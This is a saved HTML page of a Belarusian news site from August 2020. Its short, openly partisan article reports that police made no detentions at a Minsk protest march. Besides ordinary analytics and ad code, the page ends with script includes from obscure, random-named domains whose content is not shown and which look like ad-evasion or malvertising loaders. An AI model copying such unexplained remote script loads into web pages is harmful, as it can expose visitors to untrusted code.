
<!DOCTYPE html>
<html>
<head><title>
	МВД РБ: Сегодня в Минске задержаний не было | Беларусь Протесты Выборы | АФН | Белорусские новости | Республика Беларусь | Минск
</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta property="og:image" content="/images/logo.gif" /><link rel="alternate" type="application/rss+xml" title="AFN.BY - Новости Беларуси" href="/news/rss/" /><link rel="icon" href="https://afn.by/favicon.ico" type="image/x-icon" />
    <link href="/styles/cocss.css?v=2015-08-06T0014" rel="stylesheet" type="text/css" />
    <!--[if lte IE 6]>
    <link href="/styles/ie6.css" rel="stylesheet" type="text/css" />
	<![endif]-->
	
	<meta name="keywords" content="Беларусь Протесты Выборы В ходе прошедшей в центе Минска акции солидарности граждан Беларуси задержаний не было, сообщила пресс-секретарь МВД Беларуси Ольга Чемоданова." /><meta name="description" content="В ходе прошедшей в центе Минска акции солидарности граждан Беларуси задержаний не было, сообщила пресс-секретарь МВД Беларуси Ольга Чемоданова." /> 
	<link rel="stylesheet" type="text/css" href="/styles/cocss2.css" />
	

	<script>
	  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
	  ga('create', 'UA-261460-1', 'auto');
	  ga('send', 'pageview');
	</script>
	<script type="text/javascript">
	<!--//--><![CDATA[//><!--
	var pp_gemius_identifier = new String('chuaoc_Qf5oBaF0jf1u_J5PaDqti6EO9B3Q0cN4cczz.H7');
	var pp_gemius_hitcollector = 'gaby.hit.gemius.pl';
	//--><!]]>
	</script>
	<script type="text/javascript" src="/scripts/xgemius.js"></script>
	<script type='text/javascript'>
	(function() {
		var w = window,
		d = document,
		protocol =/https/i.test(w.location.protocol) ? 'https:' : 'http:',
		aml = typeof admixerML !== 'undefined' ? admixerML : { };
		aml.fn = aml.fn || [];
		aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
		aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
		if (!w.admixerML) {
			var lodash = document.createElement('script');
			lodash.id = 'amlScript';
			lodash.async = true;
			lodash.type = 'text/javascript';
			lodash.src = aml.cdnPath + 'scripts3/loader2.js';
			var node = d.getElementsByTagName('script')[0];
			node.parentNode.insertBefore(lodash, node);
			w.admixerML = aml;
		}
	})();
	</script>
	<script type='text/javascript'>
		admixerML.fn.push(function() {
                admixerML.defineSlot({z: '2febba63-69cc-42a7-8be2-e10bcbe63cd5', ph: 'admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170', i: 'inv-nets'});
                admixerML.defineSlot({z: 'a95e2ad3-94ac-4d52-9a1c-87227345965a', ph: 'admixer_a95e2ad394ac4d529a1c87227345965a_zone_16335_sect_4740_site_4170', i: 'inv-nets'});
                admixerML.singleRequest();
	});
	</script>
<script data-ad-client="ca-pub-5271363197717881" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!--giraffio start-->
<script type="text/javascript" src="//code.giraff.io/data/widget-afnby.js" async></script>
<!--giraffio end-->
<link href="/WebResource.axd?d=N56HrN1iwbcYz5K81beiSgIp2_uoHfGU-wFVWFjxPOJw_PQBExK8HwqN7-oYGDutX2nMoAYxo19ZnEZHMNsy_AXwaVkYJlLNkaQgc2qYbeoduN639SXQYfbQyUEMQ_EobI4a0Q2&amp;t=633477618823728610" type="text/css" rel="stylesheet" /></head>
<script type="text/javascript">
	<!--
	var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
	//-->
</script>
<body>
    <!--div style="height:10px;"></div-->
    <form name="aspnetForm" method="post" action="/news/i/279935" id="aspnetForm">
<div>
<input type="hidden" name="ctl00_ctl00_C_C_SM_HiddenField" id="ctl00_ctl00_C_C_SM_HiddenField" value="" />
<input type="hidden" name="__VIEWSTATE_KEY" id="__VIEWSTATE_KEY" value="VIEWSTATE_107.23.218.4_637338226884289124" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>


<script type="text/javascript">
//<![CDATA[
var __cultureInfo = '{"name":"ru-RU","numberFormat":{"CurrencyDecimalDigits":2,"CurrencyDecimalSeparator":",","IsReadOnly":true,"CurrencyGroupSizes":[3],"NumberGroupSizes":[3],"PercentGroupSizes":[3],"CurrencyGroupSeparator":" ","CurrencySymbol":"₽","NaNSymbol":"NaN","CurrencyNegativePattern":8,"NumberNegativePattern":1,"PercentPositivePattern":1,"PercentNegativePattern":1,"NegativeInfinitySymbol":"-бесконечность","NegativeSign":"-","NumberDecimalDigits":2,"NumberDecimalSeparator":",","NumberGroupSeparator":" ","CurrencyPositivePattern":3,"PositiveInfinitySymbol":"бесконечность","PositiveSign":"+","PercentDecimalDigits":2,"PercentDecimalSeparator":",","PercentGroupSeparator":" ","PercentSymbol":"%","PerMilleSymbol":"‰","NativeDigits":["0","1","2","3","4","5","6","7","8","9"],"DigitSubstitution":1},"dateTimeFormat":{"AMDesignator":"","Calendar":{"MinSupportedDateTime":"\/Date(-62135596800000)\/","MaxSupportedDateTime":"\/Date(253402289999999)\/","AlgorithmType":1,"CalendarType":1,"Eras":[1],"TwoDigitYearMax":2029,"IsReadOnly":true},"DateSeparator":".","FirstDayOfWeek":1,"CalendarWeekRule":0,"FullDateTimePattern":"d MMMM yyyy \u0027г.\u0027 H:mm:ss","LongDatePattern":"d MMMM yyyy \u0027г.\u0027","LongTimePattern":"H:mm:ss","MonthDayPattern":"MMMM dd","PMDesignator":"","RFC1123Pattern":"ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","ShortDatePattern":"dd.MM.yyyy","ShortTimePattern":"H:mm","SortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","TimeSeparator":":","UniversalSortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","YearMonthPattern":"MMMM yyyy","AbbreviatedDayNames":["Вс","Пн","Вт","Ср","Чт","Пт","Сб"],"ShortestDayNames":["Вс","Пн","Вт","Ср","Чт","Пт","Сб"],"DayNames":["воскресенье","понедельник","вторник","среда","четверг","пятница","суббота"],"AbbreviatedMonthNames":["янв","фев","мар","апр","май","июн","июл","авг","сен","окт","ноя","дек",""],"MonthNames":["Январь","Февраль","Март","Апрель","Май","Июнь","Июль","Август","Сентябрь","Октябрь","Ноябрь","Декабрь",""],"IsReadOnly":true,"NativeCalendarName":"григорианский календарь","AbbreviatedMonthGenitiveNames":["янв","фев","мар","апр","май","июн","июл","авг","сен","окт","ноя","дек",""],"MonthGenitiveNames":["января","февраля","марта","апреля","мая","июня","июля","августа","сентября","октября","ноября","декабря",""]}}';//]]>
</script>

<script src="/ScriptResource.axd?d=tN4hf4XD77l2WQyLjoc_ddnyLBfIWm_onGB7wN_8Q5BNYlJz72HuESm_oLN9FyfyBaI1OiqF1ByhfbLOAzMhfUKv2FijHSpsjK94L3GGFyHsFsFiT9lWDaWJ8r5Q1s8dcVd9C8JyMgh_i4IczZ_MCcUTgYE1&amp;t=ffffffffbcb9b94a" type="text/javascript"></script>
		
		<div style="margin: 10px auto 20px;">
			<div id='admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170'></div>
		</div>
		<script type='text/javascript'>
		admixerML.fn.push(function() { admixerML.display('admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170'); });
		</script>
		<div id="hd">
			<div id="logo">
				<a href="../../"><img src="/images/logo.gif" alt="АФН - Белорусское информационное агенство" width="120" height="60" border="0" /></a>
			</div>
			<div class="c">
				<ul id="toolbar">
					<li class="first"><a href="../../">Главная</a>&nbsp;&nbsp;</li><li><a href="../../news">Новости</a></li><li><a href="../../finances">Финансы</a></li><li><a href="../../oil">Нефть</a></li>
				</ul>
				<ul id="additional_toolbar">
					<li><a href="/sitemap">Карта сайта</a></li>
				</ul>
				<br />
				
				<div class="info">Последнее обновление: 23.08.2020 22:17</div>
				
			</div>
			
		</div>
        	
	<div id="container">
		<div id="content">
			<div class="wrapper">
				<!--:/news/i/279935:-->
<div class="banner-placeholder">
<!-- Yandex.RTB R-A-465488-1 -->
<div id="yandex_rtb_R-A-465488-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-465488-1",
                renderTo: "yandex_rtb_R-A-465488-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
</div>

				
	
    
<div id="d279935" class="doc">
    <div class="hd">
        
        <h1>МВД РБ: Сегодня в Минске задержаний не было</h1>
        
	<div style="float:left;font-size:1em;margin-right: 20px;">
        <div><span><a href="../2020/08/23">23.08.2020 22:17</a></span>&nbsp;|&nbsp;<span><a href="http://afn.by" rel="nofollow" target="_blank">АФН</a></span></div>
        
        <div>Категории: <a href="../category/1,1">Беларусь</a> <a href="../category/2,37">Протесты</a> <a href="../category/3,15661">Выборы</a></div>
	    
	</div>
	<div id="fb-root" style="margin-top:10px;"></div><script src="//connect.facebook.net/en_US/all.js#appId=177634385630657&amp;xfbml=1"></script><fb:like href="" send="true" layout="button_count" width="250" show_faces="true" font="trebuchet ms"></fb:like>
    </div>
    <div class="bd">
    <p>В ходе прошедшей в центе Минска акции солидарности граждан Беларуси задержаний не было, сообщила пресс-секретарь МВД Беларуси Ольга Чемоданова.</p><p>Она также сказала, данные о численности марша будут озвучены в понедельник утром. Впрочем, команда ватных специалистов из России, работающих в Минске на Лукашенко, оценила количество участников в 20 тыс. человек.</p><p></p>
    </div>
    <div class="ft"></div>
</div>
    <div class="clear" style="width:99%;">
		
		<div class="clear"></div>
		
<div class="l">

	<div class="hd">
		Ранее по теме
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/279913">
				<span class="time">22.08 16:05</span> <span class="title">Белорусские сыщики поймали еще одного финансиста протестов</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279911">
				<span class="time">22.08 14:01</span> <span class="title">В Глубоком уволилась идеолог райисполкома «по велению совести»</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279852">
				<span class="time">20.08 22:24</span> <span class="title">Amnesty: Уголовным делом против КС власти РБ нарушают свободу выражения мнений</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279834">
				<span class="time">20.08 13:36</span> <span class="title">Витебские железнодорожники требуют отставки Лукашенко и Ермошиной</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279784">
				<span class="time">19.08 10:29</span> <span class="title">Купаловский театр заблокирован, сотрудники и актеры не могут попасть в здание</span>
				</a>
			</li>
		
			</ul>
		
</div>

    </div>
	<div class="clear"></div>
<br><br>
<!--LuckyAds-->
<!--<div data-la-block="4e3e7c89-f061-45c3-9ca4-e90e26604ad9"></div>-->
<!-- Composite Start 
<div id="M617914ScriptRootC973088"></div>
<script src="https://jsc.lentainform.com/a/f/afn.by.973088.js" async></script>
<!-- Composite End -->

<!--giraff-->
<div id="grf_afnby_2"></div>
<br><br>
<div id="M242oY8Bs7fkyrP7JVbL" data-type="2" class="blockOfO1b2l3"></div>


    
<div class="clear"></div>
<div id="disqus_thread"></div>
<script type="text/javascript">
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'afnby'; // required: replace example with your forum shortname

    // The following are highly recommended additional parameters. Remove the slashes in front to use.
    // var disqus_identifier = 'unique_dynamic_id_1234';
    // var disqus_url = 'http://example.com/permalink-to-page.html';

    var disqus_identifier = 'afnby_news_279935';

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
<noindex>
<a href="//disqus.com" class="dsq-brlink" rel="nofollow">blog comments powered by <span class="logo-disqus">Disqus</span></a>
</noindex>

<!--

<div id="comments">
    <div class="hd" style="display:none">
		<h4>Комментарии</h4>
    	
	</div>
    
</div>


-->
<!--
<span id="ctl00_ctl00_C_C_Co_CommentsClosedLabel" class="commentsClosed">Комментарии запрещены</span>
-->
    
    
				<div class="adv clear">
					<!--2657565487752-->
				</div>
			</div>
		</div>
		<div id="info">			
			
	<div id="ctl00_ctl00_C_I_Ca" class="calendar"><div class="c"><table id="ctl00_ctl00_C_I_PC" cellspacing="0" cellpadding="2" title="Calendar" border="0" style="border-width:0px;border-collapse:collapse;">
	<tr><td colspan="7" style="background-color:Silver;"><table cellspacing="0" border="0" style="width:100%;border-collapse:collapse;">
		<tr><td style="width:15%;"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$PC','V7457')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">Июль 2020</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$PC','V7518')" style="color:Black" title="Go to the next month"></a></td></tr>
	</table></td></tr><tr><th align="center" abbr="понедельник" scope="col">Пн</th><th align="center" abbr="вторник" scope="col">Вт</th><th align="center" abbr="среда" scope="col">Ср</th><th align="center" abbr="четверг" scope="col">Чт</th><th align="center" abbr="пятница" scope="col">Пт</th><th align="center" abbr="суббота" scope="col">Сб</th><th align="center" abbr="воскресенье" scope="col">Вс</th></tr><tr><td align="center" style="width:14%;">29</td><td align="center" style="width:14%;">30</td><td align="center" style="width:14%;"><a href="/news/2020/07/01">1</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/02">2</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/03">3</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/04">4</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="/news/2020/07/06">6</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/07">7</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/08">8</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/09">9</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/10">10</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/11">11</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="/news/2020/07/13">13</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/14">14</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/15">15</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/16">16</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/17">17</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/18">18</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="/news/2020/07/20">20</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/21">21</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/22">22</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/23">23</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/24">24</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/25">25</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="/news/2020/07/27">27</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/28">28</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/29">29</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/30">30</a></td><td align="center" style="width:14%;"><a href="/news/2020/07/31">31</a></td><td align="center" style="width:14%;">1</td><td align="center" style="width:14%;">2</td></tr><tr><td align="center" style="width:14%;">3</td><td align="center" style="width:14%;">4</td><td align="center" style="width:14%;">5</td><td align="center" style="width:14%;">6</td><td align="center" style="width:14%;">7</td><td align="center" style="width:14%;">8</td><td align="center" style="width:14%;">9</td></tr>
</table></div><div class="c"><table id="ctl00_ctl00_C_I_C" cellspacing="0" cellpadding="2" title="Calendar" border="0" style="border-width:0px;border-collapse:collapse;">
	<tr><td colspan="7" style="background-color:Silver;"><table cellspacing="0" border="0" style="width:100%;border-collapse:collapse;">
		<tr><td style="width:15%;"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$C','V7487')" style="color:Black" title="Go to the previous month"></a></td><td align="center" style="width:70%;">Август 2020</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$C','V7549')" style="color:Black" title="Go to the next month"></a></td></tr>
	</table></td></tr><tr><th align="center" abbr="понедельник" scope="col">Пн</th><th align="center" abbr="вторник" scope="col">Вт</th><th align="center" abbr="среда" scope="col">Ср</th><th align="center" abbr="четверг" scope="col">Чт</th><th align="center" abbr="пятница" scope="col">Пт</th><th align="center" abbr="суббота" scope="col">Сб</th><th align="center" abbr="воскресенье" scope="col">Вс</th></tr><tr><td align="center" style="width:14%;">27</td><td align="center" style="width:14%;">28</td><td align="center" style="width:14%;">29</td><td align="center" style="width:14%;">30</td><td align="center" style="width:14%;">31</td><td align="center" style="width:14%;"><a href="/news/2020/08/01">1</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="/news/2020/08/03">3</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/04">4</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/05">5</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/06">6</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/07">7</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/08">8</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="/news/2020/08/10">10</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/11">11</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/12">12</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/13">13</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/14">14</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/15">15</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="/news/2020/08/17">17</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/18">18</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/19">19</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/20">20</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/21">21</a></td><td align="center" style="width:14%;"><a href="/news/2020/08/22">22</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="/news/2020/08/23">23</a></td></tr><tr><td class="future" align="center" style="width:14%;">24</td><td class="future" align="center" style="width:14%;">25</td><td class="future" align="center" style="width:14%;">26</td><td class="future" align="center" style="width:14%;">27</td><td class="future" align="center" style="width:14%;">28</td><td class="future" align="center" style="width:14%;">29</td><td class="future" align="center" style="width:14%;">30</td></tr><tr><td class="future" align="center" style="width:14%;">31</td><td class="future" align="center" style="width:14%;">1</td><td class="future" align="center" style="width:14%;">2</td><td class="future" align="center" style="width:14%;">3</td><td class="future" align="center" style="width:14%;">4</td><td class="future" align="center" style="width:14%;">5</td><td class="future" align="center" style="width:14%;">6</td></tr>
</table></div></div>
	<div class="clear"></div>
	
<div class="l">

	<div class="hd">
		Политика
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/279933">
				<span class="time">23.08 20:36</span> <span class="title">Оператор А1 отсутствие мобильного интернета объяснил «нацбезопасностью»</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279932">
				<span class="time">23.08 20:09</span> <span class="title">Лукашенко прилетел во Дворец независимости с автоматом в руках</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279931">
				<span class="time">23.08 19:47</span> <span class="title">Замглавы штаба Канопацкой: Мир в Беларуси сейчас в руках одного человека – главы Верховного суда</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279930">
				<span class="time">23.08 19:17</span> <span class="title">Военнослужащие в Минске задерживают граждан, режим ЧП не вводился</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279929">
				<span class="time">23.08 18:56</span> <span class="title">Министр обороны сказал, что готов воевать против граждан Беларуси</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279928">
				<span class="time">23.08 13:21</span> <span class="title">В Беларуси 22 августа были задержаны 26 граждан за право на свободу собраний</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279927">
				<span class="time">23.08 13:05</span> <span class="title">Корреспондент ТАСС о событиях в Беларуси: "Мы не дадим вам, пи...ы, разорвать нашу страну"</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279925">
				<span class="time">23.08 12:43</span> <span class="title">Бакиев с семьей покинули Беларусь, уехал и директор БНБК</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279923">
				<span class="time">23.08 09:33</span> <span class="title">Зеленский советует своему другу Лукашенко провести новые выборы</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279921">
				<span class="time">23.08 09:04</span> <span class="title">Лукашенко бросает ГАИ на «защиту» Минска от сторонников перемен</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279920">
				<span class="time">23.08 08:47</span> <span class="title">Польшу уже достала белорусская пропаганда о военной угрозе с Запада</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279919">
				<span class="time">23.08 08:22</span> <span class="title">НАТО называет заявления Лукашенко безосновательными</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279917">
				<span class="time">22.08 16:34</span> <span class="title">Лукашенко отвел СМИ и оппозиции время до понедельника</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279915">
				<span class="time">22.08 16:21</span> <span class="title">Лукашенко: Травят Беларусь, чтобы потом броситься на Россию</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279914">
				<span class="time">22.08 16:10</span> <span class="title">Лукашенко допустил, что милиция может ошибаться</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279913">
				<span class="time">22.08 16:05</span> <span class="title">Белорусские сыщики поймали еще одного финансиста протестов</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279912">
				<span class="time">22.08 14:41</span> <span class="title">Лукашенко отправил главу Минздрава бороться с <strike>коронавирусом</strike> инакомыслием в Гродненской области</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279909">
				<span class="time">22.08 13:29</span> <span class="title">Беларусь привела войска в полную боевую готовность - Лукашенко</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279908">
				<span class="time">22.08 12:18</span> <span class="title">Замгоссекретаря США встретится в Литве с Тихановской </span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279907">
				<span class="time">22.08 11:42</span> <span class="title">Лукашенко поручил военным защитить западную жемчужину Беларуси с центром в Гродно</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279906">
				<span class="time">22.08 11:39</span> <span class="title">Лукашенко: В Беларуси идет плановая цветная революция</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279905">
				<span class="time">22.08 11:20</span> <span class="title">БАЖ требует разблокировать сайты, прекратить давление на прессу</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279902">
				<span class="time">22.08 10:46</span> <span class="title">Дизайнер Цеслер уехал из Беларуси</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279900">
				<span class="time">22.08 09:06</span> <span class="title">Тихановская не будет участвовать в новых выборах</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279897">
				<span class="time">22.08 08:17</span> <span class="title">В Беларуси ограничен доступ к 70 сайтам, а также к Protonmail и Psiphon</span>
				</a>
			</li>
		
			</ul>
		
</div>

	<!--False-->

			<div class="adv clear">
<!-- Yandex.RTB R-A-465488-2 -->
<div id="yandex_rtb_R-A-465488-2"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-465488-2",
                renderTo: "yandex_rtb_R-A-465488-2",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
<!-- sidebar start -->
<!--<div id="grf_afnby"></div>-->
<!-- sidebar end -->

</div>

		<!--	-->
</div>
		<div id="nav">
			<div>
				<br />
				<ul id="menu">
					<li><a href="../top">Главное</a></li>
					
							
							<li><a href="../politics">Политика</a></li>
						
							<li><a href="../economy">Экономика</a></li>
						
							<li><a href="../energy">Энергетика</a></li>
						
							<li><a href="../social">Общество</a></li>
						
						
				</ul>
			</div>
			
			
		</div>
	</div>

		<div id="ft">
			<div class="c">
				&copy; 1995-2019 УП "Ньюс-Релиз"<br />
				<a href="../../contacts">Контактная информация</a> | <a href="../../copyrights">Права на использование</a>
			</div>
			<div class="clear">
			</div>
			
	

		</div>
    
<div>

	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWOwL+raDpAgLb4quRDQKti7kTAr/W9usEAr/W2oIBAr/W7u8OApL/2MYNApL/7KMFApL/8IgCApL/hNULApL/qLIDApL/vJ8IApL/wPsBApL/1MAOApL/uPgLApL/zEQC15yNswUC15yRmAIC15yl5QsC15zJQQLXnN2uCALXnOGLAQLXnPXQDgLXnJm9BgLXnO1UAtec8bEIAsql46gPAsql9/UEAsqlm9INAsqlr78FAsqls4QCAsqlx+ALAsql600CyqX/qggCzuKL8AwCuYv5ow4C36XfwwoC36XLrAICuLLdhwECuLLJ4A4CuLLlzQcCuLKRlg8CuLKN8wQCuLK53A0CuLLVuAUCuLLBhQICuLK9vQ8CuLKphgQCldu68QsCldvWXQKV28KmCAKV2/6DAQKV2+rsDgKV24bJBwKV27KSDwKV267/BAKV25qWAQKV27bzDgLu4ZjqDev41eixk9bwMPMIeeuiqahBIjWf" />
</div>

<script type="text/javascript">
//<![CDATA[
Sys.Application.initialize();
//]]>
</script>
</form>
<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(421539, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true,
        trackHash:true
   });
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/421539" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!-- Sape counter -->
<script type="text/javascript">
var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
</script>
<!-- Sape counter -->

<script>window.RESOURCE_O1B2L3 = 'sdfgdgf.info';</script>
<script src="//sdfgdgf.info/ux/CHxq.js" ></script>


<script async src="//dwbogv.com/8snl17291ivlm0p3y0hq8786uqv678kypxu1lk8.php"></script>

</body>
</html>
